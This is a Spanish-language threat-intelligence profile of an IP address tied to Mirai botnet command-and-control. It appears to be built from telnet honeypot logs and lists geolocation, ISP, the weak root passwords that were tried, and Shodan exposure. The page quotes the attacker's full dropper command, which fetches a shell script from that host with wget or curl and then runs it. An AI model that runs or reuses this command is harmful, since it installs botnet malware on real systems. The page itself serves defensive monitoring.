TROYANOSYVIRUS
Amenaza ActivaBAJO

87.121.79.23

Pais de Origen🇬🇧 Reino Unido
Primera Deteccion28/3/2026
Ultima Actividad6/4/2026
ISP03AI LTD
🎯
29
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇬🇧 Reino Unido
Ciudad
Desconocida
ASN
AS213725
ISP
03AI LTD

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

23

Malware Asociado

Credenciales Intentadas

🔐root/(vacio)
2x
🔐root/admin
2x
🔐root/root
1x
🔐root/123456
1x

Comandos Ejecutados

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://87.121.79.23/zato.sh -O z || curl -fs http://87.121.79.23/zato.sh -o z; chmod +x z; ./z; rm -f z2x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONOCIDO
Familias de Malware
elf.mirai
Tipos de Amenaza
botnet_cc
Confianza: 100%

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
21135445
Vulnerabilidades
CVE-2020-0796

Evaluacion de Riesgo

35
/100
BajoMedioAltoCritico